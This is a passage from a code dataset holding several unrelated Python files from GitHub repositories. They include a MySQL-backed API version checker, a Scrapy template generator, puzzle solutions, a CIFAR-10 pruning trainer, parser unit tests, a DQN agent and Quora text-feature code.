\ndef PropertyCheck(line, data_file_path, save_file_path):\n\tinformation = line.split(\"\\t\")\n\tfile_name = information[0]\n\tproperty_name = information[1]\n\tinterface_name = information[2]\n\tsuper_interface_name = information[3]\n\tproperty_type = information[4]\n\tproperty_pos = information[5]\n\tversion_id = information[6][ : information[6].rfind(\"\\n\")]\n\tprint(\"---\" + interface_name + \"---\" + property_name)\n\t# Preliminary selection: check whether the property belongs to the current interface itself:\n\tsql_1 = \"SELECT * FROM property_data_table WHERE property_name = '%s' AND interface_name = '%s' ORDER BY CONVERT(version_id,DECIMAL(12,1))\" % (property_name, interface_name)\n\ttry:\n\t\tcursor.execute(sql_1)\n\t\tresults = cursor.fetchall()\n\t\tif(len(results) > 0):\n\t\t\tsave_file_path.write(\"File: \" + file_name + \"\\tProperty: \" + property_name + \"\\tPosition: \" + property_pos + \"\\tInterface: \" + interface_name + \"\\tSuper-interface: \" + super_interface_name + \"\\nVersion constraints: \" + results[0][4])\n\t\t\tfor row in results:\n\t\t\t\tsave_file_path.write(\"\\t\" + row[4])\n\t\t\tsave_file_path.write(\"\\nVersion constraint on this property use in the program: \" + version_id + \"\\n\")\n\t\t\tif float(version_id) >= 
float(results[0][4]):\n\t\t\t\tsave_file_path.write(\"✅: this property use satisfies the version constraint\\n\\n\")\n\t\t\telse:\n\t\t\t\tsave_file_path.write(\"❌: this property use violates the version constraint\\n\\n\")\n\t\telse:\n\t\t\tsql_2 = \"SELECT super_interface_name, version_id FROM interface_data_table where interface_name = '%s' ORDER BY super_interface_name, CONVERT(version_id,DECIMAL(12,1))\" % interface_name\n\t\t\tversion_range = []\n\t\t\tsuper_interface_names = []\n\t\t\ttry:\n\t\t\t\tcursor.execute(sql_2)\n\t\t\t\tresults = cursor.fetchall()\n\t\t\t\t# iterate over the super-interfaces\n\t\t\t\tif(len(results) > 0):\n\t\t\t\t\tsuper_interface_dic = []\n\t\t\t\t\ttemp_name = results[0][0]\n\t\t\t\t\ttemp_version = results[0][1]\n\t\t\t\t\tsuper_interface_dic.append([results[0][0],results[0][1]])\n\t\t\t\t\tcount = 0\n\t\t\t\t\tfor row in results:\n\t\t\t\t\t\tif(row[0] != temp_name):\n\t\t\t\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t\t\t\tsuper_interface_dic.append([row[0],row[1]])\n\t\t\t\t\t\t\ttemp_name = row[0]\n\t\t\t\t\t\t\tcount = count + 1\n\t\t\t\t\t\ttemp_version = row[1]\n\t\t\t\t\tsuper_interface_dic[count].append(temp_version)\n\t\t\t\t\tfor dic_member in super_interface_dic:\n\t\t\t\t\t\tif(float(version_id) <= float(dic_member[2])):\n\t\t\t\t\t\t\tprint(\"father:\" + dic_member[0])\n\t\t\t\t\t\t\tsql_3 = \"SELECT * FROM property_data_table WHERE property_name = '%s' AND interface_name = '%s' ORDER BY CONVERT(version_id,DECIMAL(12,1))\" % (property_name, dic_member[0])\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tcursor.execute(sql_3)\n\t\t\t\t\t\t\t\tresults = cursor.fetchall()\n\t\t\t\t\t\t\t\tif(len(results) > 0):\n\t\t\t\t\t\t\t\t\tprint(\"find it in super interface\")\n\t\t\t\t\t\t\t\t\tif(float(results[0][4]) <= float(dic_member[2]) and float(dic_member[1]) <= float(results[len(results)-1][4])):\n\t\t\t\t\t\t\t\t\t\ttemp_version_range = [max(float(results[0][4]),float(dic_member[1])),min(float(results[len(results)-1][4]), float(dic_member[2]))]\n\t\t\t\t\t\t\t\t\t\tversion_range.append(temp_version_range)\n\t\t\t\t\t\t\t\t\t\tsuper_interface_names.append(dic_member[0])\n\t\t\t\t\t\t\t\t\tprint(temp_version_range)\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tprint(\"find father again\")\n\t\t\t\t\t\t\t\t\tFindProperty(property_name, dic_member[0], dic_member[1], dic_member[2], version_id, version_range, super_interface_names)\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\tprint(\"find error 3\")\n\t\t\texcept:\n\t\t\t\tprint(\"find error 2\")\n\t\t\tprint(version_range)\n\t\t\tif(len(version_range) > 0):\n\t\t\t\tversion_range = sorted(version_range, key=functools.cmp_to_key(version_cmp))\n\t\t\t\tsave_file_path.write(\"File: \" + file_name + \"\\tProperty: \" + property_name + \"\\tPosition: \" + property_pos + \"\\tInterface: \" + interface_name + \"\\tSuper-interface: \" + super_interface_name + \"\\nProperty inherited from super-interface \" + super_interface_names[0] + \", version constraints: [\" + str(version_range[0][0]) + \",\" + str(version_range[0][1]) + \"]\")\n\t\t\t\tcount = 1\n\t\t\t\twhile(count < len(version_range)):\n\t\t\t\t\tsave_file_path.write(\",[\" + str(version_range[count][0]) + \",\" + str(version_range[count][1]) + \"]\")\n\t\t\t\t\tcount = count + 1\n\t\t\t\tsave_file_path.write(\"\\nVersion constraint on this property use in the program: \" + version_id + \"\\n\")\n\t\t\t\tif float(version_id) >= float(version_range[0][0]):\n\t\t\t\t\tsave_file_path.write(\"✅: this property use satisfies the version constraint\\n\\n\")\n\t\t\t\telse:\n\t\t\t\t\tsave_file_path.write(\"❌: this property use violates the version constraint\\n\\n\")\n\t\t\telse:\n\t\t\t\tprint(\"this property couldn't be found\")\n\texcept:\n\t\tprint(\"find error 1\")\n\n\ndef InformationGet(data_file_path, save_file_path):\n\tdata_file = 
open(data_file_path,'r')\n\tline = data_file.readline()\n\tline_count = 1\n\twhile line:\n\t\tif(line_count % 2 == 1):\n\t\t\tPropertyCheck(line, data_file_path, save_file_path)\n\t\tline = data_file.readline()\n\t\tline_count = line_count + 1\n\nif __name__ == '__main__':\n\tdata_file_path = \"/Users/linjunhao/Desktop/complie_opt/TraversingOutput/wework_buildout/build_output_property.txt\"\n\tsave_file_name = \"/Users/linjunhao/Desktop/complie_opt/TraversingOutput/APICheck/property_check.txt\"\n\tsave_file_path = open(save_file_name,'w')\n\tprint(\"property check\")\n\tInformationGet(data_file_path, save_file_path)\n\tsave_file_path.close()\n\n# close the cursor object and the database connection (cursor first)\ncursor.close()\ndb.close()\n","repo_name":"Paladin1412/NOTE-1","sub_path":"my_work_xxido/APICheck/PropertyCheck.py","file_name":"PropertyCheck.py","file_ext":"py","file_size_in_byte":7845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31900310882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n Author: Gaomin Wu / wugm@ruyi.ai\n Time: 2018/8/3 2:24 PM\n TODO:\n\"\"\"\nimport os\nimport zipfile\nimport shutil\nfrom mako.template import Template\nimport settings\n\n\ndef add_zipfile(source_dir, output_filename):\n f = zipfile.ZipFile(output_filename, 'w', zipfile.ZIP_DEFLATED)\n for dirpath, dirnames, filenames in os.walk(source_dir):\n for filename in filenames:\n f.write(os.path.join(dirpath, filename))\n f.close()\n\n\nclass BaseTemplate(object):\n\n def __init__(self, template_name, output_name, output_dir, template_dir=\"templates\"):\n self.template = Template(filename=os.path.join(settings.BASE_DIR, template_dir, template_name),\n output_encoding=\"utf-8\")\n self.output_filename = os.path.join(output_dir, output_name)\n\n def render(self, *args, **kwargs):\n with open(self.output_filename, \"w+\") as f:\n f.write(self.template.render(**kwargs))\n\n\ndef generate_crawl_template(project, rule_fields, output_dir):\n t = BaseTemplate(template_name=\"scrapy.cfg.tpl\", output_name=\"scrapy.cfg\", output_dir=output_dir)\n t.render(**{\"project_name\": project.name})\n\n t = BaseTemplate(template_name=\"template/settings.py.tpl\", output_name=project.name + \"/settings.py\",\n output_dir=output_dir)\n t.render(**{\"project\": project})\n\n t = BaseTemplate(template_name=\"template/items.py.tpl\", output_name=project.name + \"/items.py\",\n output_dir=output_dir)\n t.render(**{\"rule_fields\": rule_fields})\n\n t = BaseTemplate(template_name=\"template/spiders/template.py.tpl\",\n output_name=project.name + \"/spiders/\" + project.name + \".py\", output_dir=output_dir)\n t.render(**{\"rule_fields\": rule_fields, \"project\": project})\n\n t = BaseTemplate(template_name=\"template/pipelines.py.tpl\", output_name=project.name + \"/pipelines.py\",\n output_dir=output_dir)\n t.render(**{\"rule_fields\": rule_fields, \"project\": project})\n\n t = BaseTemplate(template_name=\"template/middlewares/useragent_middleware.py.tpl\",\n output_name=project.name + \"/middlewares/useragent_middleware.py\", output_dir=output_dir)\n t.render()\n t = BaseTemplate(template_name=\"scripts.py.tpl\", output_name=\"scripts.py\", output_dir=output_dir)\n t.render(**{\"project\": project})\n\n\ndef start_project(project, rule_fields, output_dir=settings.OUTPUT_DIR):\n project_dir = os.path.join(output_dir, project.name)\n if os.path.exists(project_dir):\n shutil.rmtree(project_dir)\n os.makedirs(project_dir)\n # process result_dir, make dir if not exist\n result_dir = 
project.spider.result_dir\n if result_dir.startswith('.'):\n result_dir = os.path.join(project_dir, result_dir[2:])\n else:\n result_dir = result_dir\n if not os.path.exists(result_dir):\n os.makedirs(result_dir)\n project.spider.result_dir = result_dir\n sub_dir = os.path.join(project_dir, project.name)\n if os.path.exists(sub_dir):\n shutil.rmtree(sub_dir)\n os.makedirs(sub_dir)\n os.makedirs(os.path.join(sub_dir, \"spiders\"))\n os.makedirs(os.path.join(sub_dir, \"middlewares\"))\n open(os.path.join(sub_dir, \"__init__.py\"), \"w\").close()\n open(os.path.join(sub_dir, \"middlewares\", \"__init__.py\"), \"w\").close()\n open(os.path.join(sub_dir, \"spiders\", \"__init__.py\"), \"w\").close()\n project.sub_dir = sub_dir\n generate_crawl_template(project, rule_fields, project_dir)\n\n # add_zipfile(os.path.join(output_dir, project[\"name\"]), project_dir + \".zip\")\n\n\nif __name__ == '__main__':\n from settings import *\n from model import *\n\n project = {'name': 'TaiHe',\n 'pipelines': ['JsonWriterPipeline'],\n 'download_delay': 1,\n 'image_urls': 'image_srcs',\n 'images': 'images',\n 'spider': Spider({'name': 'taihe',\n 'result_dir': './result',\n 'domain': None,\n 'download_image': False,\n 'custom_settings': None,\n 'start_urls': 'http://music.taihe.com/artist'})\n }\n project = Project(project)\n # out_dir = os.path.join(OUTPUT_DIR, project.name)\n fields = [Field({'name': 'url', 'path': '//link', 'type': 'str'}),\n Field({'name': 'singerName', 'path': '//ul[@class=\"container\"]//a[contains(@href,\"artist\")]/@title',\n 'type': 'list', 'dup_filter': True})]\n rule = Rule({'rule': 'TaiHe',\n 'fields': fields,\n 'item_name': 'TaiHe',\n 'callback_func': 'parse_item'})\n start_project(project, [rule])\n","repo_name":"pattywgm/ScrapyMako","sub_path":"template_render/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":4783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23806259519","text":"def callatz(n):\n t = set()\n while n != 1:\n t.add(n)\n if n % 2 == 0:\n n //= 2\n else:\n n = (n*3+1)//2\n return t\n\ninput()\nl = list(map(int,set(input().split())))\n\nts = set()\ntl = []\n\nfor i in l:\n ss = callatz(i)\n if ts.issubset(ss):\n ts = ss\n tl = [i]\n elif ts.issuperset(ss):\n continue\n else:\n for j in tl[:]: # iterate over a copy so removal is safe\n if callatz(j).issubset(ss):\n tl.remove(j)\n ts |= ss\n tl.append(i)\n\ntl = sorted(tl, reverse=True)\nprint(' '.join(str(x) for x in tl))","repo_name":"liuchuo/PAT","sub_path":"BasicLevel_Python/1005 继续(3n+1)猜想 (25 分).py","file_name":"1005 继续(3n+1)猜想 (25 分).py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":3185,"dataset":"github-code","pt":"67"} +{"seq_id":"39270233069","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def pathSum(self, root: Optional[TreeNode], targetSum: int) -> List[List[int]]:\n self.output = []\n \n def dfs(node,path,curSum):\n if not node: # guard the current node, not the enclosing root\n return\n curSum += node.val\n temp = path + [node.val]\n if node.left:\n dfs(node.left,temp,curSum)\n if node.right:\n dfs(node.right,temp,curSum)\n if not node.left and not node.right and curSum == targetSum:\n self.output.append(temp)\n dfs(root,[],0)\n return self.output\n \n \n # output = [] \n # def dfs(root,curSum,pathList):\n # if not root:\n # return \n # curSum += root.val\n # pathList.append(root.val)\n # print(pathList)\n # if 
not root.left and not root.right:\n # if targetSum == curSum:\n # output.append(pathList)\n # if root.left:\n # dfs(root.left,curSum,pathList)\n # if root.right:\n # dfs(root.right,curSum,pathList)\n # # self.pathList.pop()\n # dfs(root,0,[])\n # return output\n\n ","repo_name":"chizzyedoka/LeetCode_solutions","sub_path":"0113-path-sum-ii/0113-path-sum-ii.py","file_name":"0113-path-sum-ii.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"12010706361","text":"import os\r\nimport torchvision.datasets as dsets\r\nimport torchvision.transforms as transforms\r\nfrom torch.optim.lr_scheduler import CosineAnnealingLR\r\nfrom gcp import *\r\nfrom tqdm import tqdm\r\nfrom model import *\r\nimport argparse\r\ndef warn(*args, **kwargs):\r\n pass\r\nimport warnings\r\nwarnings.warn = warn\r\n\r\nparser = argparse.ArgumentParser(description='CIFAR-10 Retraining')\r\nparser.add_argument('--save_dir', type=str, default='./cifarmodel/', help='Folder to save checkpoints and log.')\r\nparser.add_argument('-a', '--arch', default='resnet', type=str, metavar='N', help='network architecture (default: resnet)')\r\nparser.add_argument('-l', '--layers', default=-1, type=int, metavar='N', help='number of ResNet layers (default: -1)')\r\nparser.add_argument('-d', '--device', default='0', type=str, metavar='N', help='main device (default: 0)')\r\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N', help='number of data loading workers (default: 4)')\r\nparser.add_argument('--epochs', default=164, type=int, metavar='N', help='number of total epochs to run')\r\nparser.add_argument('-b', '--batch-size', default=128, type=int, metavar='N', help='mini-batch size (default: 128)')\r\nparser.add_argument('--lr', '--learning-rate', default=0.05, type=float, metavar='LR', help='initial learning rate')\r\nparser.add_argument('--momentum', default=0.9, type=float, metavar='M', help='momentum')\r\nparser.add_argument('--weight-decay', '--wd', default=1e-3, type=float, metavar='W', help='weight decay (default: 1e-3)')\r\nparser.add_argument('-c', '--comp', default=0.25, type=float, metavar='N', help='remaining channels (%)')\r\nparser.add_argument('-g', '--groups', default=8, type=int, metavar='N', help='number of groups (default: 8)')\r\nparser.add_argument('-r', '--reg', type=float, metavar='R', help='Group lasso hyperparameter (default: auto)')\r\n\r\nargs = parser.parse_args()\r\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=args.device\r\n\r\ndef warmup(optimizer, lr, epoch):\r\n if epoch < 2:\r\n lr = lr/4\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr\r\n\r\n if epoch == 2:\r\n lr = lr\r\n for param_group in optimizer.param_groups:\r\n param_group['lr'] = lr\r\n\r\ndef get_lr(optimizer):\r\n return [param_group['lr'] for param_group in optimizer.param_groups]\r\n\r\ndevice = torch.device(\"cuda\")\r\n\r\ndef train(filename, network):\r\n reg = args.reg\r\n \r\n\r\n train_dataset = dsets.CIFAR10(root='./dataset',\r\n train=True,\r\n download=True,\r\n transform=transforms.Compose([\r\n transforms.RandomHorizontalFlip(),\r\n transforms.RandomCrop(32, 4),\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),\r\n std=(0.2470, 0.2435, 0.2616))\r\n ]))\r\n train_loader = torch.utils.data.DataLoader(dataset=train_dataset,\r\n batch_size=args.batch_size, num_workers=args.workers,\r\n shuffle=True, drop_last=True)\r\n test_dataset = 
dsets.CIFAR10(root='./dataset',\r\n train=False,\r\n transform=transforms.Compose([\r\n transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.4914, 0.4822, 0.4465),\r\n std=(0.2470, 0.2435, 0.2616))\r\n ]))\r\n test_loader = torch.utils.data.DataLoader(dataset=test_dataset,\r\n batch_size=args.batch_size, num_workers=args.workers,\r\n shuffle=False)\r\n\r\n torch.backends.cudnn.benchmark=True\r\n cnn, netname = network(args.layers)\r\n config = netname\r\n if 'resnet' in filename:\r\n loadpath = args.save_dir+'/resnet%d_%s.pkl'%(args.layers, args.device)\r\n elif 'wrn' in filename:\r\n loadpath = args.save_dir+'/wrn%d_%s.pkl'%(args.layers, args.device)\r\n print(loadpath)\r\n cnn.load_state_dict(torch.load(loadpath)[0])\r\n\r\n criterion = nn.CrossEntropyLoss()\r\n bestacc=0\r\n \r\n if 'resnet' in filename:\r\n optimizer = torch.optim.SGD(cnn.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\r\n elif 'wrn' in filename:\r\n optimizer = torch.optim.SGD(cnn.parameters(), lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay, nesterov=True)\r\n\r\n scheduler = CosineAnnealingLR(optimizer, args.epochs)\r\n pruner = GCP(cnn, args.comp, 0, args.groups)\r\n pruner.initialize(False)\r\n bar = tqdm(total=len(train_loader) * args.epochs)\r\n for epoch in range(args.epochs):\r\n cnn.train()\r\n for step, (images, labels) in enumerate(train_loader):\r\n optimizer.zero_grad()\r\n gpuimg = images.to(device)\r\n labels = labels.to(device)\r\n\r\n outputs = cnn(gpuimg)\r\n loss = criterion(outputs, labels) + prune_reg(cnn, reg)\r\n loss.backward()\r\n optimizer.step()\r\n bar.set_description(\"[\" + config + \"]LR:%.4f|LOSS:%.2f|ACC:%.2f\" % (get_lr(optimizer)[0], loss.item(), bestacc))\r\n bar.update()\r\n\r\n scheduler.step()\r\n\r\n cnn.eval()\r\n correct = 0\r\n total = 0\r\n with torch.no_grad():\r\n for images, labels in test_loader:\r\n images = images.to(device)\r\n outputs = cnn(images)\r\n _, predicted = torch.max(outputs.data, 1)\r\n total += labels.size(0)\r\n correct += (predicted.cpu() == labels).sum().item()\r\n acc = 100 * correct / total\r\n cnn.train()\r\n\r\n if bestacc> (lambda a, b, c: a + b + c)\n p2 = fro.rgx(r\"abQ\", name=\"p2\")\n parser = fro.alt([p1, p2], name=\"parent\")\n self.assertParseErrorAttributes(\n parser, \"ab0\",\n column=2,\n line=0,\n name=\"p1\")\n\n def test_comp1(self):\n p1 = fro.seq(fro.intp, sep=r\",\").name(\"p1\")\n parser = fro.comp([r\"~\\[\", p1, r\"~\\]\"], name=\"comp\").get() | sum\n length = random.randint(0, 5)\n s = \"[{}]\".format(\",\".join(str(n) for n in range(length)))\n for i in range(len(s)):\n char = s[i]\n names = []\n if char in '[]':\n names.append(\"comp\")\n elif char in ',':\n names.append(\"p1\")\n names.append(\"comp\")\n else:\n names.append(\"int\")\n modified_s = s[:i] + \"$\" + s[i+1:]\n self.assertParseErrorAttributes(\n parser,\n modified_s,\n message=\"i={0}, s={1}\".format(i, modified_s),\n column=i,\n line=0,\n names=names)\n\n def test_nested1(self):\n parser = fro.nested(r\"\\(\", r\"\\)\")\n s = \"((hey there)(goodbye)\"\n self.assertParseErrorAttributes(\n parser,\n s,\n column=0,\n line=0)\n\n def test_seq1(self):\n floatsp = fro.seq(fro.floatp, sep=r\"~,\")\n for _ in range(10):\n length = random.randint(2, 8)\n s = \",\".join(str(utils.random_float()) for _ in range(length))\n s = s.replace(\",\", \">\", 1)\n self.assertParseErrorAttributes(\n floatsp,\n s,\n message=\"s={0}\".format(s),\n line=0)\n\n def test_tie1(self):\n def _func(parser):\n return fro.comp([r\"a\", 
parser.maybe(0).name(\"maybe\")]) >> (lambda _, y: y + 1)\n parser = fro.tie(_func, name=\"knot\")\n for i in range(0, 10):\n s = \"a\" * i + \"b\"\n self.assertParseErrorAttributes(\n parser,\n s,\n message=\"s={0}\".format(s),\n line=0,\n column=i,\n names=[\"knot\"])\n\n\n\n def assertParseErrorAttributes(self, parser, string, message=None, **kwargs):\n \"\"\"\n Asserts that parser.parse(s) raises a FroParseError, and asserts\n specified properties of the raised error\n \"\"\"\n try:\n parser.parse_str(string)\n self.fail(\"No error was thrown\")\n except fro.FroParseError as e:\n names = [m.name() for m in e.messages()]\n if \"column\" in kwargs:\n self.assertEqual(kwargs[\"column\"], e.column(index_from=0), message)\n if \"line\" in kwargs:\n self.assertEqual(kwargs[\"line\"], e.line(index_from=0), message)\n if \"name\" in kwargs:\n self.assertIn(kwargs[\"name\"], names, message)\n if \"names\" in kwargs:\n for name in kwargs[\"names\"]:\n self.assertIn(name, names, message)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ethantkoenig/fro","sub_path":"tests/test_errors.py","file_name":"test_errors.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70694366615","text":"import RL\nfrom RL.models.dqn_model import Brain\nimport numpy as np\n\n\nclass DQNActAgent(RL.Agent):\n def __init__(self, context: RL.Context, name, head_names=[\"default\"]):\n super().__init__(context, name)\n self.head_names = head_names\n self.model = Brain(self.context, '{0}/main_brain'.format(self.name), False, head_names=self.head_names)\n\n def epsilon_greedy_policy(self, model: Brain, states, epsilon):\n if not hasattr(self, \"_exp_pol_called\") and len(self.head_names) > 1:\n RL.logger.log(\"There are multiple Q heads in agent {0}. 
Exploit policy will choose greedy action using first head only\".format(self.name))\n self._exp_pol_called = True\n greedy_actions, = model.get_argmax_Q(states, head_names=[self.head_names[0]])\n r = np.random.random(size=[len(states)])\n greedy_mask = (r > epsilon).astype(int) # np.int was removed from modern NumPy; plain int is equivalent here\n random_actions = np.random.randint(0, self.context.env.action_space.n, size=[len(states)])\n actions = (1 - greedy_mask) * random_actions + greedy_mask * greedy_actions\n return actions\n\n def exploit_policy(self, model: Brain, states):\n return self.epsilon_greedy_policy(model, states, self.context.exploit_epsilon)\n\n def policy(self, model: Brain, states, exploit_modes):\n assert len(exploit_modes) == len(states)\n epsilon = [self.context.exploit_epsilon if m else self.context.epsilon for m in exploit_modes]\n return self.epsilon_greedy_policy(model, states, np.asarray(epsilon))\n\n def acts(self):\n if not self.context.eval_mode and self.runner.num_steps < self.context.minimum_experience:\n return None # let the random player act\n else:\n return self.policy(self.model, self.runner.obss, self.context.force_exploits)\n","repo_name":"bhatiaabhinav/RL","sub_path":"RL/agents/dqn_act_agent.py","file_name":"dqn_act_agent.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"25197374327","text":"import os\n\nfrom optparse import OptionParser\n\nRANDOM_SEARCH = \"random-search\"\nMODEL_EVALUATION = \"model-eval\"\n\n\nclass CLI(object):\n\n def __init__(self):\n parser = OptionParser()\n parser.add_option(\"--submit\", action=\"store_true\", help=\"Create submission files.\")\n parser.add_option(\"--sample\", action=\"store_true\", help=\"Use sample train dataset.\")\n parser.add_option(\"--logging\", action=\"store_true\", help=\"Log execution.\")\n parser.add_option(\"--model\", type=\"string\", help=\"ML Model\")\n parser.add_option(\"--iter\", type=\"string\", help=\"Number of iterations (config option must not be provided).\")\n parser.add_option(\"--config\", type=\"string\", help=\"Configuration file for model (iter option must not be provided).\")\n self.opts, _ = parser.parse_args(args=None, values=None)\n self.check_options()\n\n def check_options(self):\n model_opt = getattr(self.opts, \"model\")\n iter_opt = getattr(self.opts, \"iter\")\n config_opt = getattr(self.opts, \"config\")\n valid_models = [\"xgboost\", \"random-forest\"]\n\n if model_opt is None:\n raise ValueError(\"A model must be provided.\")\n\n if model_opt not in valid_models:\n raise ValueError(\"Invalid model: %s not in %s\" % (model_opt, str(valid_models)))\n\n if iter_opt:\n int(iter_opt)\n\n if config_opt:\n if not os.path.exists(config_opt):\n raise ValueError(\"File %s does not exist.\" % config_opt)\n\n if sum([isinstance(e, str) for e in [iter_opt, config_opt]]) != 1:\n raise ValueError(\"Exactly one flag must be used: either --iter or --config\")\n\n def determine_action(self):\n config_opt = getattr(self.opts, \"config\")\n if not config_opt:\n return RANDOM_SEARCH, getattr(self.opts, \"iter\")\n return MODEL_EVALUATION, config_opt\n\n def get(self, key):\n return getattr(self.opts, key)\n","repo_name":"RHDZMOTA/TalkingDataChallenge","sub_path":"util/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37615928659","text":"import os\nimport re\nimport pandas as pd \nimport numpy as np \nimport 
distance\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nfrom bs4 import BeautifulSoup\nfrom fuzzywuzzy import fuzz\nimport config\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nnltk.download('stopwords')\n\n\nclass DataPreprocess:\n\n def __init__(self, data, SAFE_DIV = 0.0001):\n self.data = data\n self.SAFE_DIV = SAFE_DIV \n self.STOP_WORDS = stopwords.words('english')\n \n @staticmethod\n def question_preprocess(x):\n x = str(x).lower()\n x = x.replace(\",000,000\", \"m\").replace(\",000\", \"k\").replace(\"′\", \"'\").replace(\"’\", \"'\")\\\n .replace(\"won't\", \"will not\").replace(\"cannot\", \"can not\").replace(\"can't\", \"can not\")\\\n .replace(\"n't\", \" not\").replace(\"what's\", \"what is\").replace(\"it's\", \"it is\")\\\n .replace(\"'ve\", \" have\").replace(\"i'm\", \"i am\").replace(\"'re\", \" are\")\\\n .replace(\"he's\", \"he is\").replace(\"she's\", \"she is\").replace(\"'s\", \" own\")\\\n .replace(\"%\", \" percent \").replace(\"₹\", \" rupee \").replace(\"$\", \" dollar \")\\\n .replace(\"€\", \" euro \").replace(\"'ll\", \" will\").replace(\"し\",\"\").replace(\"シ\",\"\")\n\n x = re.sub(r\"([0-9]+)000000\", r\"\\1m\", x)\n x = re.sub(r\"([0-9]+)000\", r\"\\1k\", x)\n porter = PorterStemmer()\n pattern = re.compile('\\W')\n\n if type(x) == type(''):\n x =re.sub(pattern, ' ', x)\n\n if type(x) == type(' '):\n x = porter.stem(x)\n example = BeautifulSoup(x, \"html.parser\")\n x = example.get_text()\n\n return x\n \n # @staticmethod\n def get_token_features(self, q1, q2):\n token_features = [0.0]*10\n \n # Converting the Sentence into Tokens: \n q1_tokens = q1.split()\n q2_tokens = q2.split()\n\n if len(q1_tokens) == 0 or len(q2_tokens) == 0:\n return token_features\n # Get the non-stopwords in Questions\n q1_words = set([word for word in q1_tokens if word not in self.STOP_WORDS])\n q2_words = set([word for word in q2_tokens if word not in self.STOP_WORDS])\n \n #Get the stopwords in Questions\n q1_stops = set([word for word in q1_tokens if word in self.STOP_WORDS])\n q2_stops = set([word for word in q2_tokens if word in self.STOP_WORDS])\n \n # Get the common non-stopwords from Question pair\n common_word_count = len(q1_words.intersection(q2_words))\n \n # Get the common stopwords from Question pair\n common_stop_count = len(q1_stops.intersection(q2_stops))\n \n # Get the common Tokens from Question pair\n common_token_count = len(set(q1_tokens).intersection(set(q2_tokens)))\n \n \n token_features[0] = common_word_count / (min(len(q1_words), len(q2_words)) + self.SAFE_DIV)\n token_features[1] = common_word_count / (max(len(q1_words), len(q2_words)) + self.SAFE_DIV)\n token_features[2] = common_stop_count / (min(len(q1_stops), len(q2_stops)) + self.SAFE_DIV)\n token_features[3] = common_stop_count / (max(len(q1_stops), len(q2_stops)) + self.SAFE_DIV)\n token_features[4] = common_token_count / (min(len(q1_tokens), len(q2_tokens)) + self.SAFE_DIV)\n token_features[5] = common_token_count / (max(len(q1_tokens), len(q2_tokens)) + self.SAFE_DIV)\n \n # Last word of both questions is same or not\n token_features[6] = int(q1_tokens[-1] == q2_tokens[-1])\n \n # First word of both questions is same or not\n token_features[7] = int(q1_tokens[0] == q2_tokens[0])\n \n token_features[8] = abs(len(q1_tokens) - len(q2_tokens))\n \n #Average Token Length of both Questions\n token_features[9] = (len(q1_tokens) + len(q2_tokens))/2\n return token_features\n \n @staticmethod\n def 
normalized_word_Common(row):\n w1 = set(map(lambda word: word.lower().strip(), row['question1'].split(\" \")))\n w2 = set(map(lambda word: word.lower().strip(), row['question2'].split(\" \"))) \n return 1.0 * len(w1 & w2)\n\n @staticmethod\n def normalized_word_share(row):\n w1 = set(map(lambda word: word.lower().strip(), row['question1'].split(\" \")))\n w2 = set(map(lambda word: word.lower().strip(), row['question2'].split(\" \"))) \n return 1.0 * len(w1 & w2)/(len(w1) + len(w2))\n\n @staticmethod\n def get_longest_substr_ratio(a, b):\n strs = list(distance.lcsubstrings(a, b))\n if len(strs) == 0:\n return 0\n else:\n return len(strs[0]) / (min(len(a), len(b)) + 1)\n\n def create_new_features(self):\n # normal custom features\n\n self.data[\"question1\"] = self.data[\"question1\"].fillna(\"\").apply(self.question_preprocess)\n self.data[\"question2\"] = self.data[\"question2\"].fillna(\"\").apply(self.question_preprocess)\n\n self.data['freq_qid1'] = self.data.groupby(['qid1'])['qid1'].transform('count') \n self.data['freq_qid2'] = self.data.groupby('qid2')['qid2'].transform('count')\n\n self.data['q1len'] = self.data['question1'].str.len()\n self.data['q2len'] = self.data['question1'].str.len()\n\n self.data['q1_n_words'] = self.data['question1'].apply(lambda row: len(row.split(\" \")))\n self.data['q2_n_words'] = self.data['question2'].apply(lambda row: len(row.split(\" \")))\n\n self.data['word_Common'] = self.data.apply(self.normalized_word_Common, axis=1)\n self.data['word_share'] = self.data.apply(self.normalized_word_share, axis=1)\n\n self.data['word_Total'] = self.data['q1_n_words'] + self.data['q2_n_words']\n\n self.data['freq_q1+q2'] = self.data['freq_qid1'] + self.data['freq_qid2']\n self.data['freq_q1-q2'] = abs(self.data['freq_qid1'] - self.data['freq_qid2'])\n\n # advanced features\n self.token_features = self.data.apply(lambda x: self.get_token_features(x[\"question1\"], x[\"question2\"]), axis=1)\n\n self.data[\"cwc_min\"] = list(map(lambda x: x[0], 